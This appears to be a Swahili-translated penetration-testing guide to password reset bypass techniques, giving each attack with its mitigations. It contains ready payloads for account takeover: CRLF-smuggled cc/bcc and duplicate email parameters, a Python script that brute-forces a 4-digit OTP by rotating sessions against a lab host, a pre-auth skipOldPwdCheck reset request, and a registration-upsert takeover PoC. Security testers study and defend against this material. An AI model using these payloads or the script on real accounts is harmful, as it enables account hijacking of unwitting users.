Weka upya/Nenosiri Lililosahaulika Bypass

Reading time: 11 minutes

Token ya Reset ya Nenosiri Leak Via Referrer

• The HTTP referer header may leak the password reset token if it's included in the URL. This can occur when a user clicks on a third-party website link after requesting a password reset.
• Athari: Uwezekano wa uchukuzi wa akaunti kupitia Cross-Site Request Forgery (CSRF) attacks.
• Utekelezaji: Ili kukagua kama token ya reset ya nenosiri ina leak katika referer header, omba reset ya nenosiri kwa anwani yako ya barua pepe na bonyeza link ya reset iliyotolewa. Usibadilishe nenosiri lako mara moja. Badala yake, tembea kwenda tovuti ya mtu wa tatu (kama Facebook au Twitter) wakati ukikamata maombi ukitumia Burp Suite. Chunguza maombi kuona kama referer header ina token ya reset ya nenosiri, kwani hii inaweza kufichua taarifa nyeti kwa wahusika wa tatu.
• Marejeo:
• HackerOne Report 342693
• HackerOne Report 272379
• Password Reset Token Leak Article

Password Reset Poisoning

• Wavamizi wanaweza kudanganya Host header wakati wa maombi ya password reset ili kuelekeza link ya reset kwenye tovuti yenye hatari.
• Athari: Inaweza kusababisha uchukuzi wa akaunti kwa leaking reset tokens kwa wavamizi.
• Hatua za Kukabiliana:
• Thibitisha Host header dhidi ya orodha nyeupe ya domains zinazoruhusiwa.
• Tumia mbinu salama za upande wa server (server-side) kutengeneza absolute URLs.
• Patch: Use $_SERVER['SERVER_NAME'] to construct password reset URLs instead of $_SERVER['HTTP_HOST'].
• Marejeo:
• Acunetix Article on Password Reset Poisoning

Password Reset By Manipulating Email Parameter

Wavamizi wanaweza kudanganya ombi la password reset kwa kuongeza parameter za email za ziada ili kuelekeza link ya reset.

• Ongeza barua pepe ya mavamizi kama parameter ya pili ukitumia &

POST /resetPassword
[...]
email=victim@email.com&email=attacker@email.com

• Ongeza anwani ya barua pepe ya mshambuliaji kama parametri ya pili kwa kutumia %20

POST /resetPassword
[...]
email=victim@email.com%20email=attacker@email.com

• Ongeza attacker email kama kigezo cha pili ukitumia |

POST /resetPassword
[...]
email=victim@email.com|email=attacker@email.com

• Ongeza barua pepe ya mshambuliaji kama parameter ya pili ukitumia cc

POST /resetPassword
[...]
email="victim@mail.tld%0a%0dcc:attacker@mail.tld"

• Ongeza anwani ya barua pepe ya mshambuliaji kama parameter ya pili kwa kutumia bcc

POST /resetPassword
[...]
email="victim@mail.tld%0a%0dbcc:attacker@mail.tld"

• Ongeza barua pepe ya mshambuliaji kama kigezo cha pili ukitumia ,

POST /resetPassword
[...]
email="victim@mail.tld",email="attacker@mail.tld"

• Ongeza attacker email kama parameter wa pili katika json array

POST /resetPassword
[...]
{"email":["victim@mail.tld","atracker@mail.tld"]}

• Hatua za Kupunguza Hatari:
• Changanua na thibitisha ipasavyo email parameters server-side.
• Tumia prepared statements au parameterized queries ili kuzuia injection attacks.
• Marejeo:
• https://medium.com/@0xankush/readme-com-account-takeover-bugbounty-fulldisclosure-a36ddbe915be
• https://ninadmathpati.com/2019/08/17/how-i-was-able-to-earn-1000-with-just-10-minutes-of-bug-bounty/
• https://twitter.com/HusseiN98D/status/1254888748216655872

Kubadilisha Email na Password ya Mtumiaji yeyote kupitia API Parameters

• Attackers wanaweza kubadilisha email na password parameters katika API requests ili kubadilisha account credentials.

POST /api/changepass
[...]
("form": {"email":"victim@email.tld","password":"12345678"})

• Hatua za Kukabiliana:
• Hakikisha validation kali ya parameters na authentication checks.
• Tekeleza logging na monitoring thabiti ili kugundua na kujibu shughuli zenye shaka.
• Rejea:
• Full Account Takeover via API Parameter Manipulation

Hakuna Rate Limiting: Email Bombing

• Ukosefu wa rate limiting kwenye maombi ya password reset unaweza kusababisha email bombing, kuwazidi mtumiaji kwa barua nyingi za reset.
• Hatua za Kukabiliana:
• Tekeleza rate limiting kwa msingi wa IP address au akaunti ya mtumiaji.
• Tumia CAPTCHA ili kuzuia automated abuse.
• Marejeo:
• HackerOne Report 280534

Gundua Jinsi Token ya Password Reset Inavyotengenezwa

• Kuelewa muundo au mbinu ya kuunda token kunaweza kusababisha kutabiri au brute-forcing token. Baadhi ya chaguzi:
• Kulingana na Timestamp
• Kulingana na UserID
• Kulingana na email ya User
• Kulingana na Firstname na Lastname
• Kulingana na Date of Birth
• Kulingana na Cryptography
• Hatua za Kukabiliana:
• Tumia mbinu imara za cryptographic kwa ajili ya token generation.
• Hakikisha randomness na urefu wa kutosha ili kuzuia utabiri.
• Zana: Tumia Burp Sequencer kuchambua randomness ya tokens.

Guessable UUID

• Ikiwa UUIDs (version 1) zinaweza kutabirika au kutabiriwa, washambuliaji wanaweza kuzi brute-force ili kutengeneza reset tokens halali. Angalia:

UUID Insecurities

• Hatua za Kukabiliana:
• Tumia GUID version 4 kwa randomness au tekeleza hatua za ziada za usalama kwa versions nyingine.
• Zana: Tumia guidtool kwa kuchambua na kutengeneza GUIDs.

Response Manipulation: Replace Bad Response With Good One

• Kukandamiza HTTP responses ili kupitisha error messages au vizuizi.
• Hatua za Kukabiliana:
• Tekeleza server-side checks ili kuhakikisha integrity ya response.
• Tumia njia salama za mawasiliano kama HTTPS kuzuia man-in-the-middle attacks.
• Rejea:
• Critical Bug in Live Bug Bounty Event

Kutumia Token Iliyopitwa na Wakati

• Kupima kama token zilizopitwa na wakati bado zinaweza kutumika kwa password reset.
• Hatua za Kukabiliana:
• Tekeleza sera kali za kuisha kwa token na thibitisha expiration ya token server-side.

Brute Force Password Reset Token

• Kujaribu brute-force reset token kwa kutumia zana kama Burpsuite na IP-Rotator kupitisha rate limits za IP.
• Hatua za Kukabiliana:
• Tekeleza rate-limiting thabiti na mechanisms za kufunga akaunti.
• Fuatilia shughuli zenye shaka zinazoonyesha brute-force attacks.

Jaribu Kutumia Token Yako

• Kupima kama reset token ya mshambuliaji inaweza kutumika kwa pamoja na email ya mwathiriwa.
• Hatua za Kukabiliana:
• Hakikisha token zimefungwa kwenye session ya mtumiaji au sifa nyingine za mtumiaji.

Kufuta Session wakati wa Logout/Password Reset

• Kuhakikisha sessions zinafutwa wakati mtumiaji anatoa logout au anafanya password reset.
• Hatua za Kukabiliana:
• Tekeleza usimamizi sahihi wa session, kuhakikisha sessions zote zinafutwa wakati wa logout au password reset.

Kufuta Session wakati wa Logout/Password Reset

• Reset tokens zinapaswa kuwa na muda wa kumalizika baada yake zitakuwa batili.
• Hatua za Kukabiliana:
• Weka muda wa kuisha unaofaa kwa reset tokens na udumishe kikamilifu server-side.

OTP rate limit bypass by changing your session

• Ikiwa tovuti inatumia session ya mtumiaji kufuatilia jaribio mbaya za OTP na OTP ni dhaifu (<= 4 digits) basi tunaweza kwa ufanisi ku-bruteforce OTP.
• Utekelezaji:
• Tafuta tu session token mpya baada ya kukataliwa na server.
• Mfano code inayotumia mdudu huu kwa kubahatisha kukisia OTP (wakati unabadilisha session OTP itabadilika pia, hivyo hatutaweza kuifanya bruteforce kwa mpangilio!):

# Authentication bypass by password reset
# by coderMohammed
import requests
import random
from time import sleep

headers = {
"User-Agent": "Mozilla/5.0 (iPhone14,3; U; CPU iPhone OS 15_0 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/19A346 Safari/602.1",
"Cookie": "PHPSESSID=mrerfjsol4t2ags5ihvvb632ea"
}
url = "http://10.10.12.231:1337/reset_password.php"
logout = "http://10.10.12.231:1337/logout.php"
root = "http://10.10.12.231:1337/"

parms = dict()
ter = 0
phpsessid = ""

print("[+] Starting attack!")
sleep(3)
print("[+] This might take around 5 minutes to finish!")

try:
while True:
parms["recovery_code"] = f"{random.randint(0, 9999):04}" # random number from 0 - 9999 with 4 d
parms["s"] = 164 # not important it only efects the frontend
res = requests.post(url, data=parms, allow_redirects=True, verify=False, headers=headers)

if ter == 8: # follow number of trails
out = requests.get(logout,headers=headers) # log u out
mainp = requests.get(root) # gets another phpssid (token)

cookies = out.cookies # extract the sessionid
phpsessid = cookies.get('PHPSESSID')
headers["cookies"]=f"PHPSESSID={phpsessid}" #update the headers with new session

reset = requests.post(url, data={"email":"tester@hammer.thm"}, allow_redirects=True, verify=False, headers=headers) # sends the email to change the password for
ter = 0 # reset ter so we get a new session after 8 trails
else:
ter += 1
if(len(res.text) == 2292): # this is the length of the page when u get the recovery code correctly (got by testing)
print(len(res.text)) # for debug info
print(phpsessid)

reset_data = { # here we will change the password to somthing new
"new_password": "D37djkamd!",
"confirm_password": "D37djkamd!"
}
reset2 = requests.post(url, data=reset_data, allow_redirects=True, verify=False, headers=headers)

print("[+] Password has been changed to:D37djkamd!")
break
except Exception as e:
print("[+] Attck stopped")

Arbitrary password reset via skipOldPwdCheck (pre-auth)

Baadhi ya utekelezaji hutoa kitendo cha password change kinachoitisha rotina ya password-change na skipOldPwdCheck=true na hakithibitishi token yoyote ya reset au umiliki. Ikiwa endpoint inakubali parameter ya action kama change_password na username/new password katika request body, mshambuliaji anaweza kufanya reset ya akaunti yoyote pre-auth.

Mfano dhaifu (PHP):

// hub/rpwd.php
RequestHandler::validateCSRFToken();
$RP = new RecoverPwd();
$RP->process($_REQUEST, $_POST);

// modules/Users/RecoverPwd.php
if ($request['action'] == 'change_password') {
$body = $this->displayChangePwd($smarty, $post['user_name'], $post['confirm_new_password']);
}

public function displayChangePwd($smarty, $username, $newpwd) {
$current_user = CRMEntity::getInstance('Users');
$current_user->id = $current_user->retrieve_user_id($username);
// ... criteria checks omitted ...
$current_user->change_password('oldpwd', $_POST['confirm_new_password'], true, true); // skipOldPwdCheck=true
emptyUserAuthtokenKey($this->user_auth_token_type, $current_user->id);
}

Exploitation request (dhana):

POST /hub/rpwd.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded

action=change_password&user_name=admin&confirm_new_password=NewP@ssw0rd!

Mikakati ya kupunguza hatari:

• Daima weka sharti token halali ya reset yenye muda wa uhalali, iliyounganishwa na akaunti na session kabla ya kubadilisha nenosiri.
• Usifunue njia za skipOldPwdCheck kwa watumiaji wasioidhinishwa; lazimisha uthibitishaji kwa mabadiliko ya kawaida ya nenosiri na thibitisha nenosiri la zamani.
• Ghairi uhalali wa session zote zilizo hai na token za reset baada ya kubadilisha nenosiri.

Registration-as-Password-Reset (Upsert on Existing Email)

Baadhi ya programu hutekeleza signup handler kama upsert. Ikiwa barua pepe tayari ipo, handler husasisha rekodi ya mtumiaji kimya kimya badala ya kukataa ombi. Wakati registration endpoint inakubali body ndogo ya JSON yenye barua pepe iliyopo na nenosiri jipya, kwa ufanisi inageuka kuwa pre-auth password reset bila ukaguzi wowote wa umiliki, ikiruhusu takeover kamili ya akaunti.

Pre-auth ATO PoC (kuandika nenosiri la mtumiaji aliyepo):

POST /parents/application/v4/admin/doRegistrationEntries HTTP/1.1
Host: www.target.tld
Content-Type: application/json

{"email":"victim@example.com","password":"New@12345"}

Marejeo

• https://anugrahsr.github.io/posts/10-Password-reset-flaws/#10-try-using-your-token
• https://blog.sicuranext.com/vtenext-25-02-a-three-way-path-to-rce/
• Jinsi Nilivyogundua Hitilafu Muhimu ya Password Reset (Registration upsert ATO)